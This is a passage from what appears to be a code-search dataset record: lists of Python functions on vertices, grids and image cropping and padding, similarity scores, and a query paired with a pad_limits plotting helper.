for (y,d) in v.items()])\n v = s.union(t)\n return list(v)", "def GetRegionVertices(self, *float, **kwargs):\n ...", "def get_vertices(self):\n return str(self.vert_dict.keys())", "def get_neighbour_vertices(self, cur: Union[str, int]) -> list:\n\t\tvertices = [edge[0] if edge[1] == cur else edge[1] for edge in self.get_neighbour_edges(cur)]\n\t\treturn vertices", "def calculate_box(vertices: [[float]]) -> [float]:\n x_coords = [x[0] for x in vertices]\n y_coords = [x[1] for x in vertices]\n z_coords = [x[2] for x in vertices]\n\n return [min(x_coords), min(y_coords), min(z_coords), max(x_coords), max(y_coords), max(z_coords)]", "def get_outer_vertices(feature):\n return [\n point\n for part in Geometry.get_multipolygon(feature)\n for point in part[0][0:-1]\n ]", "def vertices(self):\n top_exp = TopologyUtils.TopologyExplorer(self.topods_shape(), ignore_orientation=True)\n return map(Vertex, top_exp.vertices())", "def vertices(self):\n \n yielded = set()\n \n # Iterate over every tuple of edges, e.g. ..., (1, 2), (4, 3), ...\n for vertices in self.edges():\n # Iterate over every vertex in the tuple, e.g. ..., 1, 2, 4, 3, ...\n for vertex in vertices:\n # Yield if it has not been yielded already\n if vertex not in yielded:\n yield vertex", "def vertices(size):\n return set(range(size))", "def get_vertices(self):\n output = []\n \n for vertex in self.adjacency_list:\n output.append(vertex.value)\n\n return output", "def verts(self):\n return self._xys[:-1]", "def getGrid(x,y,w,h,x_step=1, y_step=1):\n X,Y = np.mgrid[x:x+w:x_step, y:y+h:y_step]\n return np.array(np.vstack((X.flatten(),Y.flatten())).transpose(), dtype=np.float32)", "def get_sound_vertices(self):\n\n vals = np.sum(np.abs(self.base_vectors), axis=1, keepdims=True)\n V = [[v,-v] for v in vals]\n combs = list(itertools.product(*V))\n\n vertices = []\n for cb in combs:\n vertices.append(self.base_vertices+np.array(cb))\n vertices = np.concatenate(vertices, axis=1)\n return vertices", "def neighbors_in(self, vertex):\n return list(self.neighbor_in_iterator(vertex))", "def make_grid(self, nx, ny):\n nx_vec = np.arange(nx)\n ny_vec = np.arange(ny)\n yv, xv = np.meshgrid(ny_vec, nx_vec)\n grid = np.stack((yv, xv), axis=2)\n grid = grid.reshape(1, 1, ny, nx, 2)\n return grid", "def list_vertices(self):\n return list(self.graph_dict.keys())", "def getHealpixVertices(pixels, nside, nest=False):\n corners = np.transpose(hp.boundaries(nside, pixels, step=1, nest=nest), (0, 2, 1))\n corners_x = corners[:, :, 0].flatten()\n corners_y = corners[:, :, 1].flatten()\n corners_z = corners[:, :, 2].flatten()\n vertices_lon, vertices_lat = hp.rotator.vec2dir(corners_x, corners_y, corners_z, lonlat=True)\n return np.stack([vertices_lon.reshape(-1, 4), vertices_lat.reshape(-1, 4)], axis=-1)", "def find_hull_vertices(points: np.ndarray) -> np.ndarray:\n M = 3\n N = points.shape[0]\n for i in range(4, N):\n while ccw(points[M], points[M - 1], points[i]) >= 0:\n M -= 1\n\n M += 1\n swap(points, M, i)\n\n return points[1:M + 1]", "def redefinir_vertices(self):\n self.nueva_posicion_posible_parte_inferior = [0,0]\n self.nueva_posicion_posible_parte_superior = [0,0]\n self.vertice_1 = self.posicion\n self.vertice_2 = [self.posicion[0] + self.medidas, self.posicion[1]]\n self.vertice_3 = [self.posicion[0], self.posicion[1] + self.medidas]\n self.vertice_4 = [self.posicion[0] + self.medidas, self.posicion[1] + self.medidas]", "def get_neighbors(grid, x, y):\n out = []\n if x > 0:\n out.append(grid[x-1, y])\n if y > 0:\n out.append(grid[x, y-1])\n if y < grid.shape[1] - 1:\n out.append(grid[x, y+1])\n if x < grid.shape[0] - 1:\n out.append(grid[x+1, y])\n return out", "def _create_nodes_from_vertices(self, vertices: List[np.ndarray]) -> List[str]:\n nodes = []\n for vertice in vertices:\n lon, lat = self.proj(vertice[0], vertice[1], inverse=True)\n node = Node(self.id_count, lat, lon)\n nodes.append(node.id_)\n self.osm.add_node(node)\n return nodes", "def create_grid(self):\n return [[0] * self.width for _ in range(self.height)]", "def _calcOrderedCellVertexIDs(self):\n ids = numerix.zeros((8, self.nx, self.ny, self.nz), 'l')\n indices = numerix.indices((self.nx, self.ny, self.nz))\n ids[1] = indices[0] + (indices[1] + (indices[2] + 1) * (self.ny + 1) + 1) * (self.nx + 1)\n ids[0] = ids[1] + 1\n ids[3] = indices[0] + (indices[1] + (indices[2] + 1) * (self.ny + 1)) * (self.nx + 1)\n ids[2] = ids[3] + 1\n ids[5] = indices[0] + (indices[1] + indices[2] * (self.ny + 1) + 1) * (self.nx + 1)\n ids[4] = ids[5] + 1\n ids[7] = indices[0] + (indices[1] + indices[2] * (self.ny + 1)) * (self.nx + 1)\n ids[6] = ids[7] + 1\n\n return numerix.reshape(ids.swapaxes(1, 3), (8, self.numberOfCells))", "def hexgrid(self):\n n = self.n * 2\n vectors = []\n for u in range(-n, n+1):\n us = [u] * (2*n+1)\n if u < 0:\n vectors.extend(zip(us, range(-n-u, n+1), range(-n, n+u+1)))\n else:\n vectors.extend(zip(us, range(-n, n-u+1), range(-n+u, n+1)))\n return vectors", "def coord_vecs(self):\n return [np.linspace(x0, x1, nx) for x0, x1, nx in zip(self.mins, self.maxs, self.shape)]", "def vertices(self):\n return self._outgoing.keys()", "def get_vertices_list(feature):\n return [\n point\n for part in Geometry.get_multipolygon(feature)\n for ring in part\n for point in ring[0:-1]\n ]", "def vertex_generator(self):\n for V in self.Vrepresentation():\n if V.is_vertex():\n yield V", "def grid(self):\n return self.__grid", "def grid_coordinates(points: np.array, dtype = np.uint16) -> np.array:\n xmin = np.min(points[:, 0])\n xmax = np.max(points[:, 0]) + 1\n ymin = np.min(points[:, 1])\n ymax = np.max(points[:, 1]) + 1\n return np.asarray([(x, y) for y in range(ymin, ymax)\n for x in range(xmin, xmax)], dtype = dtype)", "def getStartSpots(self):\n spots = []\n if self.index == 0:\n startRow = 1\n endRow = 4\n if self.index == 1:\n startRow = 6\n endRow = 9\n for row in range(startRow, endRow):\n for col in range(1,9):\n spots += [(col, row)]\n return spots", "def get_voxel_grid(bbox, grid_shape):\n # Make sure that we have the appropriate inputs\n assert bbox.shape[0] == 6\n assert bbox.shape[1] == 1\n\n xyz = [\n np.linspace(s, e, c, endpoint=True, dtype=np.float32)\n for s, e, c in\n zip(bbox[:3], bbox[3:], grid_shape)\n ]\n bin_size = np.array([xyzi[1]-xyzi[0] for xyzi in xyz]).reshape(3, 1, 1, 1)\n return np.stack(np.meshgrid(*xyz, indexing=\"ij\")) + bin_size/2", "def generate_square_vertices(geom):\n unit = geom.pix_x.unit\n width = geom.pixel_width.to_value(unit) / 2\n x = geom.pix_x.to_value(unit)\n y = geom.pix_y.to_value(unit)\n\n x_offset = width[:, np.newaxis] * np.array([-1, -1, 1, 1])\n y_offset = width[:, np.newaxis] * np.array([1, -1, -1, 1])\n\n x = x[:, np.newaxis] + x_offset\n y = y[:, np.newaxis] + y_offset\n return x, y", "def ij_coordinates(self):\n\n x = np.arange(self.nx)\n y = np.arange(self.ny)\n return np.meshgrid(x, y)", "def tensor_grid(x):\n\treturn np.vstack(np.meshgrid(*x, indexing = 'ij')).reshape((len(x), -1)).T" ]
[ "0.6591957", "0.65517676", "0.6523746", "0.6520511", "0.64833", "0.64833", "0.64218307", "0.6383808", "0.6376488", "0.63350326", "0.6328131", "0.63177186", "0.6316762", "0.6278034", "0.6251261", "0.6179584", "0.61629945", "0.6152223", "0.61260945", "0.6122966", "0.6108887", "0.60676056", "0.6065647", "0.60630107", "0.60521007", "0.60490906", "0.6042865", "0.60328555", "0.6027899", "0.6008264", "0.60005057", "0.5999993", "0.599495", "0.59603286", "0.5946714", "0.59194773", "0.5900009", "0.5898707", "0.5884395", "0.5853112", "0.584554", "0.5844604", "0.58323616", "0.5829233", "0.5802609", "0.57890654", "0.5787268", "0.5786915", "0.57860225", "0.57860225", "0.57860225", "0.5785146", "0.57598394", "0.57568735", "0.57502794", "0.5732237", "0.57189417", "0.57123196", "0.5710647", "0.57075804", "0.5704906", "0.5692509", "0.56921583", "0.5682122", "0.5671217", "0.5656707", "0.56449246", "0.5608603", "0.56030893", "0.55993694", "0.5578814", "0.5575662", "0.55648255", "0.5564655", "0.5563406", "0.5558604", "0.55573654", "0.55552995", "0.5529451", "0.55252635", "0.5520144", "0.551509", "0.5503583", "0.54966676", "0.5496303", "0.5490904", "0.5484265", "0.5476749", "0.5475671", "0.54750556", "0.5473159", "0.54716724", "0.54678017", "0.54635787", "0.54626346", "0.54583997", "0.5455706", "0.5453851", "0.5450337", "0.5449222" ]
0.76482964
0
Compute padded image limits for x and y grids.
def pad_limits(xgrid, ygrid, xpad=0., ypad=0., square=None): xmin, xmax = xgrid.min(), xgrid.max() ymin, ymax = ygrid.min(), ygrid.max() dx = xmax - xmin dy = ymax - ymin x0 = xmin - xpad*dx x1 = xmax + xpad*dx y0 = ymin - ypad*dy y1 = ymax + ypad*dy if square: axis = square ax_position = axis.get_position() ax_height = ax_position.height * axis.figure.get_figheight() ax_width = ax_position.width * axis.figure.get_figwidth() ax_aspect = ax_height / ax_width im_height = y1 - y0 im_width = x1 - x0 im_aspect = im_height / im_width if (im_height/im_width) > (ax_height/ax_width): # Image too tall extra_w = im_height/ax_aspect - im_width x0 -= extra_w / 2 x1 += extra_w / 2 else: # Image too wide extra_h = im_width*ax_aspect - im_height y0 -= extra_h / 2 y1 += extra_h / 2 return [x0, x1, y0, y1]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_image_bounds(pixel_meter_size, frame, beam_width_data, additional_pixel_padding_x=0, additional_pixel_padding_y=0):\n\n # Compute the projected locations of all samples so that we can get the extent\n all_bl = []\n all_br = []\n all_fr = []\n all_fl = []\n\n for beam_num in [0, frame.BeamCount / 2, frame.BeamCount - 1]:\n for bin_num in [0, frame.samplesperbeam - 1]:\n bl, br, fr, fl = get_box_for_sample(beam_num, bin_num, frame, beam_width_data)\n\n all_bl.append(bl)\n all_br.append(br)\n all_fr.append(fr)\n all_fl.append(fl)\n\n all_bl = np.array(all_bl)\n all_br = np.array(all_br)\n all_fr = np.array(all_fr)\n all_fl = np.array(all_fl)\n\n # Get the xdim extent\n min_back_left = np.min(all_bl[:,0])\n min_back_right = np.min(all_br[:,0])\n min_front_left = np.min(all_fl[:,0])\n min_front_right = np.min(all_fr[:,0])\n assert min_back_left < min_back_right\n assert min_back_left < min_front_left\n assert min_back_left < min_front_right\n\n max_back_left = np.max(all_bl[:,0])\n max_back_right = np.max(all_br[:,0])\n max_front_left = np.max(all_fl[:,0])\n max_front_right = np.max(all_fr[:,0])\n assert max_back_right > max_back_left\n assert max_back_right > max_front_left\n assert max_back_right > max_front_right\n\n xdim_extent = np.array([min_back_left, max_back_right])\n\n\n # Get the ydim extent\n min_back_left = np.min(all_bl[:,1])\n min_back_right = np.min(all_br[:,1])\n min_front_left = np.min(all_fl[:,1])\n min_front_right = np.min(all_fr[:,1])\n min_front = min(min_front_left, min_front_right)\n assert min_front < min_back_right\n assert min_front < min_back_left\n\n\n max_back_left = np.max(all_bl[:,1])\n max_back_right = np.max(all_br[:,1])\n max_front_left = np.max(all_fl[:,1])\n max_front_right = np.max(all_fr[:,1])\n max_back = max(max_back_left, max_back_right)\n assert max_back > max_front_right\n assert max_back > max_front_left\n\n ydim_extent = np.array([min_front, max_back])\n\n # Determine which meter location corresponds to our \"target center\"\n bl, br, fr, fl = get_box_for_sample(frame.BeamCount / 2, 0, frame, beam_width_data)\n target_center_x = (fl[0] + fr[0]) / 2.\n target_center_y = (bl[1] + fl[1]) / 2.\n\n # Determine the x dimension size and what this corresponds to in meters\n extra_padding_x = pixel_meter_size + pixel_meter_size * additional_pixel_padding_x\n\n # X Min\n xmin_len = target_center_x - xdim_extent[0]\n xp = xmin_len % pixel_meter_size\n xmin_padded = xdim_extent[0] - (extra_padding_x - xp)\n xmin_len = target_center_x - xmin_padded\n x_min_cells = np.abs(xmin_len / pixel_meter_size)\n x_min_meters = target_center_x - xmin_len\n assert x_min_meters <= xdim_extent[0]\n\n\n # X Max\n xmax_len = xdim_extent[1] - target_center_x\n xp = xmax_len % pixel_meter_size\n xmax_padded = xdim_extent[1] + (extra_padding_x - xp)\n xmax_len = xmax_padded - target_center_x\n x_max_cells = np.abs(xmax_len / pixel_meter_size)\n x_max_meters = target_center_x + xmax_len\n assert x_max_meters >= xdim_extent[1]\n\n\n # if we want a specific beam to be the in the middle of the image then we should take the max?\n xdim = int(x_min_cells + x_max_cells)\n x_meter_start = x_min_meters\n x_meter_stop = x_max_meters\n\n # Determine the y dimension size and what this corresponds to in meters\n extra_padding_y = pixel_meter_size + pixel_meter_size * additional_pixel_padding_y\n\n # Y Min\n ymin_len = target_center_y - ydim_extent[0]\n yp = ymin_len % pixel_meter_size\n ymin_padded = ydim_extent[0] - ( extra_padding_y - yp)\n ymin_len = target_center_y - ymin_padded\n y_min_cells = np.abs(ymin_len / pixel_meter_size)\n y_min_meters = target_center_y - ymin_len\n assert y_min_meters <= ydim_extent[0]\n\n # Y Max\n ymax_len = ydim_extent[1] - target_center_y\n yp = ymax_len % pixel_meter_size\n ymax_padded = ydim_extent[1] + (extra_padding_y - yp)\n ymax_len = ymax_padded - target_center_y\n y_max_cells = np.abs(ymax_len / pixel_meter_size)\n y_max_meters = target_center_y + ymax_len\n assert y_max_meters >= ydim_extent[1]\n\n ydim = int(y_min_cells + y_max_cells)\n y_meter_start = y_max_meters\n y_meter_stop = y_min_meters\n\n return xdim, ydim, x_meter_start, y_meter_start, x_meter_stop, y_meter_stop", "def padding(self):\n if not self._pixels:\n return Bounds(0, 0, 0, 0)\n row_inked = tuple(self._1 in _row for _row in self._pixels)\n if not any(row_inked):\n return Bounds(self.width, self.height, 0, 0)\n bottom = row_inked[::-1].index(True)\n top = row_inked.index(True)\n col_inked = tuple(self._1 in _col for _col in zip(*self._pixels))\n left = col_inked.index(True)\n right = col_inked[::-1].index(True)\n return Bounds(left, bottom, right, top)", "def _axes_limits(image_width, fractional_padding=0.5):\n # calculate widths and padding for each item\n overlay_width = image_width\n colorbar_width = int(0.05 * image_width)\n xy_width = image_width\n overlay_colorbar_padding_width = int(0.05 * image_width)\n colorbar_xy_padding_width = int(fractional_padding * image_width)\n\n # set limits based on item sizes\n left_lim = 0\n right_lim = overlay_width\n overlay_lim = (left_lim, right_lim)\n\n left_lim = right_lim + overlay_colorbar_padding_width\n right_lim = left_lim + colorbar_width\n colorbar_lim = (left_lim, right_lim)\n\n left_lim = right_lim + colorbar_xy_padding_width\n right_lim = left_lim + xy_width\n xy_lim = (left_lim, right_lim)\n\n return colorbar_lim, overlay_lim, xy_lim", "def visualize_grid(Xs, ubound=255.0, padding=1):\n (N, H, W, C) = Xs.shape\n grid_size = int(ceil(sqrt(N)))\n grid_height = H * grid_size + padding * (grid_size - 1)\n grid_width = W * grid_size + padding * (grid_size - 1)\n grid = np.zeros((grid_height, grid_width, C))\n next_idx = 0\n y0, y1 = 0, H\n for y in range(grid_size):\n x0, x1 = 0, W\n for x in range(grid_size):\n if next_idx < N:\n img = Xs[next_idx]\n low, high = np.min(img), np.max(img)\n grid[y0:y1, x0:x1] = ubound * (img - low) / (high - low)\n # grid[y0:y1, x0:x1] = Xs[next_idx]\n next_idx += 1\n x0 += W + padding\n x1 += W + padding\n y0 += H + padding\n y1 += H + padding\n # grid_max = np.max(grid)\n # grid_min = np.min(grid)\n # grid = ubound * (grid - grid_min) / (grid_max - grid_min)\n return grid", "def checkRange(x,y,w,h,maxW,maxH):\n if x < 0:\n x = 0\n if y < 0:\n y = 0\n if x + w >= maxW:\n w = maxW-x-1\n if y + h >= maxH:\n h = maxH-y-1\n return [x,y,w,h]", "def __clip_bbox(min_y, min_x, max_y, max_x):\n min_y = tf.clip_by_value(min_y, 0.0, 1.0)\n min_x = tf.clip_by_value(min_x, 0.0, 1.0)\n max_y = tf.clip_by_value(max_y, 0.0, 1.0)\n max_x = tf.clip_by_value(max_x, 0.0, 1.0)\n return min_y, min_x, max_y, max_x", "def bounds(self):\n return self.min_col, self.min_row, self.max_col, self.max_row", "def _get_bounds(x, y, size):\n x = np.array(np.atleast_1d(x))\n y = np.array(np.atleast_1d(y))\n\n lower_x = np.rint(x - size[0]/2)\n lower_y = np.rint(y - size[1]/2)\n\n return np.stack((np.stack((lower_x, lower_x + size[0]), axis=1),\n np.stack((lower_y, lower_y + size[1]), axis=1)), axis=1).astype(int)", "def crop(masks, boxes, padding: int = 1):\n h, w, n = masks.shape\n x1, x2 = sanitize_coordinates(boxes[:, 0:1:1], boxes[:, 2:3:1], w, padding, cast=False)\n y1, y2 = sanitize_coordinates(boxes[:, 1:2:1], boxes[:, 3:4:1], h, padding, cast=False)\n\n cast = P.Cast()\n broadcast_to = P.BroadcastTo((h, w, n))\n row = broadcast_to((P.range(Tensor(0, mindspore.int32),\n Tensor(w, mindspore.int32),\n Tensor(1, mindspore.int32)).view(1, -1, 1)))\n rows = cast(row, x1.dtype)\n col = broadcast_to((P.range(Tensor(0, mindspore.int32),\n Tensor(w, mindspore.int32),\n Tensor(1, mindspore.int32)).view(-1, 1, 1)))\n cols = cast(col, x2.dtype)\n\n\n masks_left = rows >= x1.view(1, 1, -1)\n masks_right = rows < x2.view(1, 1, -1)\n masks_left = P.Cast()(masks_left, mindspore.float16)\n masks_right = P.Cast()(masks_right, mindspore.float16)\n crop_mask = masks_left * masks_right\n masks_up = cols >= y1.view(1, 1, -1)\n masks_up = P.Cast()(masks_up, mindspore.float16)\n crop_mask *= masks_up\n masks_down = cols < y2.view(1, 1, -1)\n masks_down = P.Cast()(masks_down, mindspore.float16)\n crop_mask *= masks_down\n\n return masks * crop_mask", "def image_crop_pad_cv2(images,pos_x,pos_y,pix,final_h,final_w,padding_mode=\"cv2.BORDER_CONSTANT\"):\r\n #Convert position of cell from \"um\" to \"pixel index\"\r\n pos_x,pos_y = pos_x/pix,pos_y/pix \r\n\r\n for i in range(len(images)):\r\n image = images[i]\r\n \r\n #Compute the edge-coordinates that define the cropped image\r\n y1 = np.around(pos_y[i]-final_h/2.0) \r\n x1 = np.around(pos_x[i]-final_w/2.0) \r\n y2 = y1+final_h \r\n x2 = x1+final_w\r\n\r\n #Are these coordinates within the oringinal image?\r\n #If not, the image needs padding\r\n pad_top,pad_bottom,pad_left,pad_right = 0,0,0,0\r\n\r\n if y1<0:#Padding is required on top of image\r\n pad_top = int(abs(y1))\r\n y1 = 0 #set y1 to zero and pad pixels after cropping\r\n \r\n if y2>image.shape[0]:#Padding is required on bottom of image\r\n pad_bottom = int(y2-image.shape[0])\r\n y2 = image.shape[0]\r\n \r\n if x1<0:#Padding is required on left of image\r\n pad_left = int(abs(x1))\r\n x1 = 0\r\n \r\n if x2>image.shape[1]:#Padding is required on right of image\r\n pad_right = int(x2-image.shape[1])\r\n x2 = image.shape[1]\r\n \r\n #Crop the image\r\n temp = image[int(y1):int(y2),int(x1):int(x2)]\r\n\r\n if pad_top+pad_bottom+pad_left+pad_right>0:\r\n if padding_mode==\"Delete\":\r\n temp = np.zeros_like(temp)\r\n else:\r\n #Perform all padding operations in one go\r\n temp = cv2.copyMakeBorder(temp, pad_top, pad_bottom, pad_left, pad_right, eval(padding_mode))\r\n \r\n images[i] = temp\r\n \r\n return images", "def boundary(self,image,i,j):\r\n if((j >=25- self.padding) and (j <=175+ self.padding ) and (i >= 425- self.padding) and (i <= 575+ self.padding)):\r\n image[self.maximum_size-i,j,:]=0,0,0\r\n self.image_p[i,j,:]=2\r\n #print(2)\r", "def image_crop_pad_cv2(images,pos_x,pos_y,pix,final_h,final_w,padding_mode=\"cv2.BORDER_CONSTANT\"):\r\n #Convert position of cell from \"um\" to \"pixel index\"\r\n pos_x = [pos_x_/pix for pos_x_ in pos_x]\r\n pos_y = [pos_y_/pix for pos_y_ in pos_y]\r\n padding_modes = [\"cv2.BORDER_CONSTANT\",\"cv2.BORDER_REFLECT\",\"cv2.BORDER_REFLECT_101\",\"cv2.BORDER_REPLICATE\",\"cv2.BORDER_WRAP\"]\r\n \r\n for i in range(len(images)):\r\n image = images[i]\r\n \r\n #Compute the edge-coordinates that define the cropped image\r\n y1 = np.around(pos_y[i]-final_h/2.0) \r\n x1 = np.around(pos_x[i]-final_w/2.0) \r\n y2 = y1+final_h \r\n x2 = x1+final_w\r\n\r\n #Are these coordinates within the oringinal image?\r\n #If not, the image needs padding\r\n pad_top,pad_bottom,pad_left,pad_right = 0,0,0,0\r\n\r\n if y1<0:#Padding is required on top of image\r\n pad_top = int(abs(y1))\r\n y1 = 0 #set y1 to zero and pad pixels after cropping\r\n \r\n if y2>image.shape[0]:#Padding is required on bottom of image\r\n pad_bottom = int(y2-image.shape[0])\r\n y2 = image.shape[0]\r\n \r\n if x1<0:#Padding is required on left of image\r\n pad_left = int(abs(x1))\r\n x1 = 0\r\n \r\n if x2>image.shape[1]:#Padding is required on right of image\r\n pad_right = int(x2-image.shape[1])\r\n x2 = image.shape[1]\r\n \r\n #Crop the image\r\n temp = image[int(y1):int(y2),int(x1):int(x2)]\r\n\r\n if pad_top+pad_bottom+pad_left+pad_right>0:\r\n if padding_mode.lower()==\"delete\":\r\n temp = np.zeros_like(temp)\r\n else:\r\n #Perform all padding operations in one go\r\n if padding_mode.lower()==\"alternate\":\r\n ind = rand_state.randint(low=0,high=len(padding_modes))\r\n padding_mode = padding_modes[ind]\r\n temp = cv2.copyMakeBorder(temp, pad_top, pad_bottom, pad_left, pad_right, eval(padding_modes[ind]))\r\n else:\r\n temp = cv2.copyMakeBorder(temp, pad_top, pad_bottom, pad_left, pad_right, eval(padding_mode))\r\n \r\n images[i] = temp\r\n \r\n return images", "def __padding(self, image, boxes, height, width):\n temp = boxes[:, :4].astype(np.int)\n y1 = np.where(temp[:, 0] < 0)[0]\n if len(y1) > 0:\n temp[y1, 0] = 0\n x1 = np.where(temp[:, 1] < 0)[0]\n if len(x1) > 0:\n temp[x1, 0] = 0\n y2 = np.where(temp[:, 2] > image.shape[0] - 1)[0]\n if len(y2) > 0:\n temp[y2, 0] = image.shape[0] - 1\n x2 = np.where(temp[:, 3] > image.shape[1] - 1)[0]\n if len(x2) > 0:\n temp[x2, 0] = image.shape[1] - 1\n pad_top = np.abs(temp[:, 0] - boxes[:, 0]).astype(np.int)\n pad_left = np.abs(temp[:, 1] - boxes[:, 1]).astype(np.int)\n pad_bottom = np.abs(temp[:, 2] - boxes[:, 2]).astype(np.int)\n pad_right = np.abs(temp[:, 3] - boxes[:, 3]).astype(np.int)\n input_data = np.empty([boxes.shape[0], 3, height, width], dtype=np.float32)\n for i in range(boxes.shape[0]):\n crop_img = image[temp[i, 0]:temp[i, 2] + 1, temp[i, 1]:temp[i, 3] + 1, :]\n crop_img = cv2.copyMakeBorder(crop_img, pad_top[i], pad_bottom[i], \\\n pad_left[i], pad_right[i], cv2.BORDER_CONSTANT, value=0)\n if crop_img is None:\n continue\n crop_img = cv2.resize(crop_img, (width, height)).astype(np.float32)\n crop_img[:, :, 0] -= self.mean[0]\n crop_img[:, :, 1] -= self.mean[1]\n crop_img[:, :, 2] -= self.mean[2]\n crop_img *= self.scale_factor\n crop_img = np.transpose(crop_img, (2, 0, 1))\n input_data[i] = crop_img.copy()\n return input_data", "def _get_padded_grid_(ax):\n ax_pad = np.zeros(ax.size + 2)\n ax_pad[1:-1] = ax\n ax_pad[0] = ax[0] - (ax[2] - ax[1])\n ax_pad[-1] = ax[-1] + (ax[2] - ax[1])\n\n return ax_pad", "def crop_mask(mask, crop_offset=0.5):\n maxx, maxy, minx, miny = 0, 0, 0, 0\n for r in range(0, mask.shape[0]):\n if np.min(mask[r]) < 255:\n minx = int(r + mask.shape[0] * (crop_offset / 100))\n break\n\n for r in range(mask.shape[0] - 1, 0, -1):\n if np.min(mask[r]) < 255:\n maxx = int(r - mask.shape[0] * (crop_offset / 100))\n break\n\n for c in range(0, mask.shape[1]):\n if np.min(mask[:, c]) < 255:\n miny = int(c + mask.shape[1] * (crop_offset / 100))\n break\n\n for c in range(mask.shape[1] - 1, 0, -1):\n if np.min(mask[:, c]) < 255:\n maxy = int(c - mask.shape[1] * (crop_offset / 100))\n break\n\n return (maxx, maxy, minx, miny)", "def _grid_around_star(self, x0, y0, data):\n lenx, leny = data.shape\n xmin, xmax = max(x0 - self._box / 2, 0), min(x0 + self._box / 2 + 1, lenx - 1)\n ymin, ymax = max(y0 - self._box / 2, 0), min(y0 + self._box / 2 + 1, leny - 1)\n return np.mgrid[int(xmin) : int(xmax), int(ymin) : int(ymax)]", "def boundary1(self,image,i,j):\r\n if((j >=375- self.padding) and (j <=625+ self.padding ) and (i >= 425- self.padding) and (i <= 575+ self.padding)):\r\n image[self.maximum_size-i,j,:]=0,0,0\r\n self.image_p[i,j,:]=2", "def adjustCoordByBorders(self, x, y):\n (x_offset, y_offset) = (0, 0)\n if (127 < x < (255+4)):\n x_offset -= 4\n \n if (31 < y < (63+4*1)):\n y_offset -= 4\n elif ( (63+4*1) < y < (95+4*2) ):\n y_offset -= 4*2\n elif ( (95+4*2) < y < (127+4*3) ):\n y_offset -= 4*3\n elif ( (127+4*3) < y < (159+4*4) ):\n y_offset -= 4*4\n elif ( (159+4*4) < y < (191+4*5) ):\n y_offset -= 4*5\n elif ( (191+4*5) < y < (223+4*6) ):\n y_offset -= 4*6\n elif ( (223+4*6) < y < (255+4*7) ):\n y_offset -= 4*7\n return x_offset, y_offset", "def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8", "def _clip_boxes(boxes, im_shape):\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(boxes[:, 0::4], 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(boxes[:, 1::4], 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.minimum(boxes[:, 2::4], im_shape[1] - 1)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.minimum(boxes[:, 3::4], im_shape[0] - 1)\n return boxes", "def _clip_boxes(boxes, im_shape):\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(boxes[:, 0::4], 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(boxes[:, 1::4], 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.minimum(boxes[:, 2::4], im_shape[1] - 1)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.minimum(boxes[:, 3::4], im_shape[0] - 1)\n return boxes", "def _compute_equal_axes_ranges(x_min, x_max, y_min, y_max):\n\n x_axis_min, x_axis_max, y_axis_min, y_axis_max = x_min, x_max, y_min, y_max\n x_range, y_range = abs(x_max - x_min), abs(y_max - y_min)\n if x_range > y_range:\n y_center = (y_max + y_min) / 2\n y_axis_max = y_center + x_range / 2\n y_axis_min = y_center - x_range / 2\n else:\n x_center = (x_max + x_min) / 2\n x_axis_max = x_center + y_range / 2\n x_axis_min = x_center - y_range / 2\n\n return x_axis_min, x_axis_max, y_axis_min, y_axis_max", "def clip_grid(grid, xr, yr, extra_m=5000):\n\n min_x = np.min(xr)\n min_y = np.min(yr)\n max_x = np.max(xr)\n max_y = np.max(yr)\n\n mask_x = np.logical_and(grid.x['data'] > min_x - extra_m,\n grid.x['data'] < max_x + extra_m)\n mask_y = np.logical_and(grid.y['data'] > min_y - extra_m,\n grid.y['data'] < max_y + extra_m)\n\n grid.x['data'] = grid.x['data'][mask_x]\n grid.y['data'] = grid.y['data'][mask_y]\n for f in grid.fields.keys():\n nz = len(grid.fields[f]['data']) # Nb of z levels\n grid.fields[f]['data'] = grid.fields[f]['data'][np.ix_(range(nz),\n mask_y, mask_x)]\n grid.nx = len(grid.x['data'])\n grid.ny = len(grid.y['data'])\n return grid", "def visualize_grid(Xs, ubound=255.0, padding=1):\n pixel_sz = 2\n (H, W, C, N) = Xs.shape\n\n Xs_resize = np.zeros((H*pixel_sz, W*pixel_sz, C, N))\n Xs = (ubound*(Xs-np.min(Xs))/(np.max(Xs)-np.min(Xs))).astype('uint8')\n\n for c in range(C):\n for n in range(N):\n Xs_resize[:,:,c,n] = imresize(Xs[:,:,c,n], 200, interp='nearest')\n Xs = Xs_resize\n\n (H, W, C, N) = Xs.shape\n low, high = np.min(Xs), np.max(Xs)\n\n if C==1 or C==3:\n grid_size_H = int(ceil(sqrt(N)))\n grid_size_W = int(ceil(sqrt(N)))\n else:\n grid_size_H = N\n grid_size_W = C\n\n count = 0\n grid_height = H * grid_size_H + padding * (grid_size_H-1)\n grid_width = W * grid_size_W + padding * (grid_size_W-1)\n grid = np.zeros((grid_height, grid_width, C))\n y0, y1 = 0, H\n for y in range(grid_size_H):\n x0, x1 = 0, W\n for x in range(grid_size_W):\n if C==1 or C==3:\n img = Xs[:,:,:,count]\n count += 1\n else:\n img = np.expand_dims(Xs[:,:,x,y], axis=-1)\n\n grid[y0:y1, x0:x1, :] = ubound * (img - low) / (high - low)\n x0 += W + padding\n x1 += W + padding\n\n y0 += H + padding\n y1 += H + padding\n\n if C!=3:\n grid = grid[:,:,0]\n return grid", "def _fix_span(x, y, xmin, xmax):\n if x.ndim != 1:\n return x, y\n\n # Roll in same direction if some points on right-edge extend\n # more than 360 above min longitude; *they* should be on left side\n lonroll = np.where(x > xmin + 360)[0] # tuple of ids\n if lonroll.size: # non-empty\n roll = x.size - lonroll.min()\n x = np.roll(x, roll)\n y = np.roll(y, roll, axis=-1)\n x[:roll] -= 360 # make monotonic\n\n # Set NaN where data not in range xmin, xmax. Must be done\n # for regional smaller projections or get weird side-effects due\n # to having valid data way outside of the map boundaries\n y = y.copy()\n if x.size - 1 == y.shape[-1]: # test western/eastern grid cell edges\n y[..., (x[1:] < xmin) | (x[:-1] > xmax)] = np.nan\n elif x.size == y.shape[-1]: # test the centers and pad by one for safety\n where = np.where((x < xmin) | (x > xmax))[0]\n 